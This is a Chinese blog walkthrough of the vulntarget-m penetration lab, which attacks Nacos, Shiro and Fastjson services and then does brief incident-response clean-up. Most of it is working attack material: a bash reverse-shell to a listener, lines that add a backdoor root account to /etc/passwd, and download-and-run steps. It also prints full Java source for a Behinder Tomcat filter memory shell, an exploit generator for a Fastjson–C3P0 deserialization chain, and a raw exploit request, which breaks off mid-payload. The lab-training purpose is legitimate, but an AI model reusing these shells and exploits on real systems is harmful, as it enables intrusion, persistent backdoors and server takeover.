vulntarget-m(星期五实验室)

已于 2024-03-22 15:59:18 修改
阅读量1.1k 收藏 31
点赞数 24
文章标签: web安全
于 2024-03-04 16:26:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ka_ka11/article/details/136455759
版权

环境描述

某公司将自己公司的业务搬到了云上,并存在内网服务,公司运维人员主要通过远程ssh登录入口机,对服务进行日常维护和管理。

在前段时间,某国外黑客发现该公司的入口机存在漏洞,并入侵了该机器,同时可能入侵了内网系统。

运维在今日登录维护的时候,发现ssh无法登录,经过排查发现ssh密码目前已经被修改。

由于环境特殊,暂时无法通过其他的方法对机器进行重置密码,且由于业务的重要性,不能够对服务器进行重启等。

根据以上条件:

请利用先攻再应急的特殊思维方法来进行应急。

靶场修复

由于电脑芯片问题,导致虚拟机必须重启,部分服务关闭,内存马失效(再次打入内存马可能无法打入,或者无法连接内存马)

入口机01的nacos服务

1.删除原来的服务目录

cd /var/local
sudo rm -rf nacos
密码:vulntarget

2.重新启动虚拟机

3.解压nacos压缩包,启动nacos服务

sudo unzip nacos-server-2.0.1.zip
sudo -E bash startup.sh -m standalone

出现下图,表示启动nacos服务成功

内网机02的shiro服务

shiro服务是通过nginx的反向代理在入口机使用

shiro具体的服务是架设在内网机的02服务上

修改root密码

sudo vim /etc/passwd
zSZ7Whrr8hgwY

切换到root

su root
123456

在/home/vulntarget/目录下启动服务

java -jar app.jar

出现下图代表启动成功

内网机03的fastjson服务

由于重新启动了内网主机03,导致原来的内存马已经失效,因此无法进行第三台服务器的应急。

我们这里使用自己的注入的冰蝎内存马的,同时完成内存马的破环,完成热更新。模拟上述应急过程

入口机01

端口扫描

对主机进行全端口扫描,发现nacos和一个登录页面服务

shiro-80端口-无利用key

在登录测试过程中发现shiro服务,未发现shiro的key

未成功爆破密钥

nacos服务-8848端口

使用工具扫描nacos工具,扫描发现多个漏洞

Nacos未授权访问漏洞(CVE-2021-29441)

添加账户,登录后台,发现敏感信息泄露,同时发现shiro的key

#权限认证
shiro:
  enabled: true
  set-login-uri: /login
  key: KduO0i+zUIMcNNJnsZwU9Q==

Nacos Jraft Hessian反序列化漏洞

2024-03-04 13:48:40 : 内存马成功注入

1、CMD内存马需要设置请求头x-client-data:cmd和Referer:https://www.google.com/和cmd:whoami

2、冰蝎内存马需要设置请求头x-client-data:rebeyond和设置Referer:https://www.google.com/,连接路径随意,密码rebeyond

3、哥斯拉内存马需要设置请求头x-client-data:godzilla和Referer:https://www.google.com/,连接路径随意,密码是pass 和 key

shiro-使用找到的key

爆破利用链,执行命令成功

ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.137.10  netmask 255.255.255.0  broadcast 192.168.137.255
        inet6 fe80::20c:29ff:fe7d:e0b6  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:7d:e0:b6  txqueuelen 1000  (Ethernet)
        RX packets 9185  bytes 1930776 (1.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11875  bytes 2583609 (2.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4765  bytes 389116 (389.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4765  bytes 389116 (389.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

发现是137网段的,不是我们访问的ip,同时通过指纹识别,发现使用的反向代理

使用多种方式注入内存马,均注入失败

连接naco服务的内存马

使用冰蝎连接,未成功

使用哥斯拉连接成功

不是交互式的shell,无法检查flag

将shell反弹到服务器,这里我本来使用云服务器,但是不知道为啥不成功,改使用本地的kali

bash -i >& /dev/tcp/192.168.138.133/4560 0>&1
nc -lvvp 4560
应急响应--检查flag

应急失败,继续检查其他

在etc/passwd发现隐藏账户,在哥斯拉上进行删除

再次检测flag,是否应急成功

内网机02

ssh远程连接内网02

经过上面的渗透过程,我们已经获得内网的02的root权限

入口机192.168.137.20 与内网机02 192.168.137.10 在同一网段

我们在入口机修改root用户的密码,直接使用ssh登录

连接成功

在内网机02添加账户,在入口机上连接

直接写入,没有成功

echo "system:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash" >> /etc/passwd

wget http://192.168.137.20:81/a
chmod 777 a
bash ./a

查看写入成功

连接失败,权限不足

将开启远程连接的root设置用文件写入

wget http://192.168.137.20:81/b
chmod 777 b
bash ./b

重启一下ssh

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
重启
/etc/init.d/ssh restart

连接成功

ssh system@192.168.137.10 密码admin123
应急响应--删除黑客账号

应急响应---内存马检查

查看启动的java的程序

将app.jar下载后,进行反编译

这里发现一个写死的后门程序--UserController.java

这里主要用来判断

检测木马是否可以使用

curl http://127.0.0.1/exec?cmd=whoami
root

破坏代码

完成对代码的破坏,对程序进行热更新

1.需要准备arthas-boot工具及环境

因为第二台服务器不能上网,需要我们打包环境,放在目的服务器root目录下面进行解压

arthas 热更新_arthas热更新-CSDN博客

java -jar arthas-boot.jar
tar -cvf arthas.tar.arthas
tar -zvf arthas.tar

2.对UserController.java进行反编译,实现热更新

搭建springboot服务,引入依赖,进行编译,这里 尝试了很多次,最后也没有成功,奈何脚本小子不会java呀,唉,留到后面再补吧

运行工具arthas-boot.jar

java -jar arthas-boot.jar

然后进行热更新


retransform /tmp/regengxin/UserController.class

查看是否完成更新

jad --source-only com.example.shiro550.controller.UserController

此时再去执行下命令,看下当前的后门已经失效:

内网机03

建立代理

frpc frps 在内网机01搭建

fastjson拿到rce权限

端口扫描

指纹识别--版本探测

删除右侧"}"

还可以使用urldns,因为在内网这里就不行

探测具体版本

代码对字段 @type、ldap、rmi,TemplatesImpl等 进行过滤

在源码中,Fastjson在解析时会自动解码unicode和hex编码字符,

{
 "\u0040\u0074\u0079\u0070\u0065": "java.lang.AutoCloseable"

爆出的版本为1.2.47, 版本很低,且在这个版本及以下Fastjson 存在mappings缓存通杀绕过,利用的方式为JNDI

非严格意义上的出网,比如这里我们控制了外网主机,可以使用外网主机作为server端能提供 ldap或rmi

受到JDK 版本限制,JDK8U191 以后受到trusturlcodebase 限制远程加载,但是也有绕过方法。

这里是因为机器内JDK版本较高,JNDI 注入并不合适 所以需要找其他利用连

判断存在的依赖 利用Character转换报错可以判断存在何种依赖

RequestMapping本身为SpringBoot下的类,当存在该类时会报出类型转换错误,说明为SpringBoot项目(这里要替换@type unicode)

{
  "x": {
    "\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
  "\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
  "val": "org.springframework.web.bind.annotation.RequestMapping"
  }
 }

通过这种方法结合已知的FastJson利用链所需要的依赖类,最终探测服务中存在C3P0依赖:

{
  "x": {
    "\u0040\u0074\u0079\u0070\u0065": "java.lang.Character"{
  "\u0040\u0074\u0079\u0070\u0065": "java.lang.Class",
  "val": "com.mchange.v2.c3p0.DataSources"
  }
 }

生成攻击

FastJson本身结合C3P0有很多利用方式,其中提的最多的是不出网利用,hex base二次反序列化打内存马。 在c3p0+FastJson利用其他文章中介绍的是需要依赖像cc链这样的反序列化链,但其实是不需要的,因为FastJson全版本都存在原生反序列化漏洞,且是通过TemplatesImpl加载类,更加适合。 先找一个冰蝎内存马:Tomcat的Filter型内存马,但因为是TemplatesImpl这条链加载字节码,所以需要extends AbstractTranslet并重写两个方法,否则加载不了这个类。 编译为IceShell.class:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.DispatcherType;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import sun.misc.BASE64Decoder;

public class IceShell extends AbstractTranslet implements Filter {
    private final String pa = "3ad2fddfe8bad8e6";

    public IceShell() {
    }

    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest)servletRequest;
        HttpServletResponse response = (HttpServletResponse)servletResponse;
        HttpSession session = request.getSession();
        Map<String, Object> pageContext = new HashMap();
        pageContext.put("session", session);
        pageContext.put("request", request);
        pageContext.put("response", response);
        ClassLoader cl = Thread.currentThread().getContextClassLoader();
        if (request.getMethod().equals("POST")) {
            Class Lclass;
            if (cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else if (cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")) {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            } else {
                Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                this.RushThere(Lclass, cl, session, request, pageContext);
            }

            filterChain.doFilter(servletRequest, servletResponse);
        }

    }

    public void destroy() {
    }

    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map<String, Object> pageContext) {
        byte[] bytecode = Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");

        try {
            Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            define.setAccessible(true);
            Class uclass = null;

            try {
                uclass = cl.loadClass("U");
            } catch (ClassNotFoundException var18) {
                uclass = (Class)define.invoke(cl, bytecode, 0, bytecode.length);
            }

            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
            constructor.setAccessible(true);
            Object u = constructor.newInstance(this.getClass().getClassLoader());
            Method Um = uclass.getDeclaredMethod("g", byte[].class);
            Um.setAccessible(true);
            String k = "3ad2fddfe8bad8e6";
            session.setAttribute("u", k);
            Cipher c = Cipher.getInstance("AES");
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
            byte[] eClassBytes = c.doFinal((new BASE64Decoder()).decodeBuffer(request.getReader().readLine()));
            Class eclass = (Class)Um.invoke(u, eClassBytes);
            Object a = eclass.newInstance();
            Method b = eclass.getDeclaredMethod("equals", Object.class);
            b.setAccessible(true);
            b.invoke(a, pageContext);
        } catch (Exception var19) {
        }

    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        try {
            String name = "AutomneGreet";
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();
            Field Configs = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map)Configs.get(standardContext);
            if (filterConfigs.get("AutomneGreet") == null) {
                Filter filter = new IceShell();
                FilterDef filterDef = new FilterDef();
                filterDef.setFilter(filter);
                filterDef.setFilterName("AutomneGreet");
                filterDef.setFilterClass(filter.getClass().getName());
                standardContext.addFilterDef(filterDef);
                FilterMap filterMap = new FilterMap();
                filterMap.addURLPattern("/shell");
                filterMap.setFilterName("AutomneGreet");
                filterMap.setDispatcher(DispatcherType.REQUEST.name());
                standardContext.addFilterMapBefore(filterMap);
                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
                constructor.setAccessible(true);
                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)constructor.newInstance(standardContext, filterDef);
                filterConfigs.put("AutomneGreet", filterConfig);
            }
        } catch (Exception var10) {
        }

    }
}

内存马做好后结合c3p0链生成json,最终exp如下:

import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javax.management.BadAttributeValueExpException;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;

public class Test {
    public static void main(String[] args) throws Exception {
        String hex2 = bytesToHex(tobyteArray(gen()));
        String FJ1247 = "{\n" +
                "    \"a\":{\n" +
                "        \"@type\":\"java.lang.Class\",\n" +
                "        \"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"\n" +
                "    },\n" +
                "    \"b\":{\n" +
                "        \"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\n" +
                "        \"userOverridesAsString\":\"HexAsciiSerializedMap:" + hex2 + ";\",\n" +
                "    }\n" +
                "}\n";
        System.out.println(FJ1247);
    }
    //FastJson原生反序列化加载恶意类字节码
    public static Object gen() throws Exception {
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        byte[] bytes = Files.readAllBytes(Paths.get("e:\\IceShell.class")); //做好的冰蝎马地址,读取其中字节即可
        setValue(templates, "_bytecodes", new byte[][]{bytes});
        setValue(templates, "_name", "1");
        setValue(templates, "_tfactory", null);

        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templates);

        BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
        setValue(bd,"val",jsonArray);

        HashMap hashMap = new HashMap();
        hashMap.put(templates,bd);
        return hashMap;
    }
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    //将类序列化为字节数组
    public static byte[] tobyteArray(Object o) throws IOException {
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bao);
        oos.writeObject(o);   //
        return bao.toByteArray();
    }

    //字节数组转十六进制
    public static String bytesToHex(byte[] bytes) {
        StringBuffer stringBuffer = new StringBuffer();
        for (int i = 0; i < bytes.length; i++) {
            String hex = Integer.toHexString(bytes[i] & 0xff);      //bytes[]中为带符号字节-255~+255,&0xff: 保证得到的数据在0~255之间
            if (hex.length()<2){
                stringBuffer.append("0" + hex);   //0-9 则在前面加‘0’,保证2位避免后面读取错误
            }else {
                stringBuffer.append(hex);
            }
        }
        return stringBuffer.toString();
    }
}

运行exp即可生成一段json数据:

POST /login HTTP/1.1
Host: 192.168.137.30
Content-Length: 21923
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.137.30
Referer: http://192.168.137.30/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=88F24F3F2546A406AC66CF936EB0A642
Connection: close

{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"java.lang.Class",
        "val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",
        "\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067":"HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e002000078700000254acafebabe0000003401880a005e00cc0800cd09004b00ce0700cf0700d00b000400d10700d20a000700cc08007f0b004900d308007b08007d0a00d400d50a00d400d60b000400d70800d80a00d900da0a002400db0a001c00dc0a001c00dd0800de0a004b00df0b00e000e10a00e200e30800e40a00e500e60800e70700e80700a40900e900ea0a001c00eb0a00ec00ed0800ee0a002700ef0700f00700f10a00e900f20a00ec00f30700f40a001c00f50a00f600ed0a001c00f70a00f600f80800f908009d0b00fa00fb0800fc0a00fd00fe0700ff0a00d901000a003101010a00fd01020701030a003500cc0b000401040a010501060a003501070a00fd01080a001c010908010a07010b08010c07010d0a003f010e0b010f01100701110801120a001c01130800c90a001c01140a011500ed0a011501160701170b004901160701180a004b00cc0701190a004d00cc0a004d011a0a004d011b0a004d011c0a0042011d07011e0a005300cc08011f0a005301200a0053011b09012101220a012101230a005301240a0042012507012607012707012807012901000270610100124c6a6176612f6c616e672f537472696e673b01000d436f6e7374616e7456616c75650100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000a4c4963655368656c6c3b010004696e697401001f284c6a617661782f736572766c65742f46696c746572436f6e6669673b295601000c66696c746572436f6e66696701001c4c6a617661782f736572766c65742f46696c746572436f6e6669673b01000a457863657074696f6e7307012a0100104d6574686f64506172616d6574657273010008646f46696c74657201005b284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b4c6a617661782f736572766c65742f46696c746572436861696e3b29560100064c636c6173730100114c6a6176612f6c616e672f436c6173733b01000e736572766c65745265717565737401001e4c6a617661782f736572766c65742f536572766c6574526571756573743b01000f736572766c6574526573706f6e736501001f4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b01000b66696c746572436861696e01001b4c6a617661782f736572766c65742f46696c746572436861696e3b010007726571756573740100274c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b010008726573706f6e73650100284c6a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73653b01000773657373696f6e0100204c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b01000b70616765436f6e7465787401000f4c6a6176612f7574696c2f4d61703b010002636c0100174c6a6176612f6c616e672f436c6173734c6f616465723b0100164c6f63616c5661726961626c65547970655461626c650100354c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b01000d537461636b4d61705461626c6507011807012b07012c07012d0700cf0700d007012e0701170700f40700e807012f01000764657374726f79010009527573685468657265010081284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a6176612f7574696c2f4d61703b295601000576617231380100224c6a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e3b010006646566696e6501001a4c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000675636c61737301000b636f6e7374727563746f7201001f4c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b010001750100124c6a6176612f6c616e672f4f626a6563743b010002556d0100016b010001630100154c6a617661782f63727970746f2f4369706865723b01000b65436c61737342797465730100025b4201000665636c617373010001610100016201000862797465636f64650701300700f007010b0100095369676e61747572650100a7284c6a6176612f6c616e672f436c6173733b4c6a6176612f6c616e672f436c6173734c6f616465723b4c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b4c6a617661782f736572766c65742f687474702f48747470536572766c6574526571756573743b4c6a6176612f7574696c2f4d61703c4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b3e3b29560100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0701310100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e01000666696c7465720100164c6a617661782f736572766c65742f46696c7465723b01000966696c7465724465660100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b01000966696c7465724d61700100314c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b0100324c6f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e6669673b0100046e616d65010015776562617070436c6173734c6f61646572426173650100324c6f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173653b01000f7374616e64617264436f6e7465787401002a4c6f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578743b010007436f6e666967730100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000d66696c746572436f6e6669677301000a536f7572636546696c6501000d4963655368656c6c2e6a6176610c00630064010010336164326664646665386261643865360c006000610100256a617661782f736572766c65742f687474702f48747470536572766c6574526571756573740100266a617661782f736572766c65742f687474702f48747470536572766c6574526573706f6e73650c013201330100116a6176612f7574696c2f486173684d61700c013401350701360c013701380c0139013a0c013b013c010004504f535407013d0c010a013e0c013f01400c014101400c0142013c0100156a6176612e6c616e672e436c6173734c6f616465720c0094009507012d0c007101430701440c0145014801026479763636766741414144514147676f41424141554367414541425548414259484142634241415938615735706444344241426f6f54477068646d4576624746755a7939446247467a633078765957526c636a73705667454142454e765a4755424141394d6157356c546e5674596d5679564746696247554241424a4d62324e6862465a68636d6c68596d786c56474669624755424141523061476c7a415141445446553741514142597745414630787159585a684c327868626d63765132786863334e4d6232466b5a584937415141425a7745414653686251696c4d616d4632595339735957356e4c304e7359584e7a4f7745414157494241414a6251674541436c4e7664584a6a5a555a706247554241415a564c6d7068646d454d41415541426777414741415a415141425651454146577068646d4576624746755a7939446247467a633078765957526c636745414332526c5a6d6c755a554e7359584e7a415141584b46744353556b7054477068646d4576624746755a7939446247467a637a734149514144414151414141414141414941414141464141594141514148414141414f67414341414941414141474b6975334141477841414141416741494141414142674142414141414167414a4141414146674143414141414267414b4141734141414141414159414441414e414145414151414f41413841415141484141414150514145414149414141414a4b6973444b37363341414b7741414141416741494141414142674142414141414177414a4141414146674143414141414351414b414173414141414141416b4145414152414145414151415341414141416741540701490c014a014b01000b646566696e65436c61737301000f6a6176612f6c616e672f436c61737307014c0c014d00740c014e014f0701300c01500151010001550c015201530100206a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e0100106a6176612f6c616e672f4f626a6563740c015401550c015601570100156a6176612f6c616e672f436c6173734c6f616465720c0158015907015a0c015b013a0c015c015d0100016707012e0c015e015f0100034145530701600c0161016201001f6a617661782f63727970746f2f737065632f5365637265744b6579537065630c016301640c006301650c006a016601001673756e2f6d6973632f4241534536344465636f6465720c016701680701690c016a013c0c016b014b0c016c016d0c015c016e010006657175616c730100136a6176612f6c616e672f457863657074696f6e01000c4175746f6d6e6547726565740100306f72672f6170616368652f636174616c696e612f6c6f616465722f576562617070436c6173734c6f61646572426173650c016f01700701710c017201730100286f72672f6170616368652f636174616c696e612f636f72652f5374616e64617264436f6e746578740100286f72672e6170616368652e636174616c696e612e636f72652e5374616e64617264436f6e746578740c017401530c017501760701770c0178017901000d6a6176612f7574696c2f4d61700100084963655368656c6c01002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465660c017a017b0c017c017d0c017e017d0c017f018001002f6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61700100062f7368656c6c0c0181017d0701820c018301840c00c2013c0c0185017d0c018601870100306f72672f6170616368652f636174616c696e612f636f72652f4170706c69636174696f6e46696c746572436f6e66696701001b6f72672f6170616368652f636174616c696e612f436f6e74657874010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a617661782f736572766c65742f46696c74657201001e6a617661782f736572766c65742f536572766c6574457863657074696f6e01001c6a617661782f736572766c65742f536572766c65745265717565737401001d6a617661782f736572766c65742f536572766c6574526573706f6e73650100196a617661782f736572766c65742f46696c746572436861696e01001e6a617661782f736572766c65742f687474702f4874747053657373696f6e0100136a6176612f696f2f494f457863657074696f6e0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01000a67657453657373696f6e01002228294c6a617661782f736572766c65742f687474702f4874747053657373696f6e3b010003707574010038284c6a6176612f6c616e672f4f626a6563743b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010015676574436f6e74657874436c6173734c6f6164657201001928294c6a6176612f6c616e672f436c6173734c6f616465723b0100096765744d6574686f6401001428294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f537472696e67010015284c6a6176612f6c616e672f4f626a6563743b295a010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100076765744e616d65010040284c6a617661782f736572766c65742f536572766c6574526571756573743b4c6a617661782f736572766c65742f536572766c6574526573706f6e73653b29560100106a6176612f7574696c2f42617365363401000a6765744465636f6465720100074465636f64657201000c496e6e6572436c617373657301001c28294c6a6176612f7574696c2f426173653634244465636f6465723b0100186a6176612f7574696c2f426173653634244465636f6465720100066465636f6465010016284c6a6176612f6c616e672f537472696e673b295b420100116a6176612f6c616e672f496e7465676572010004545950450100116765744465636c617265644d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a29560100096c6f6164436c617373010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b01000776616c75654f660100162849294c6a6176612f6c616e672f496e74656765723b010006696e766f6b65010039284c6a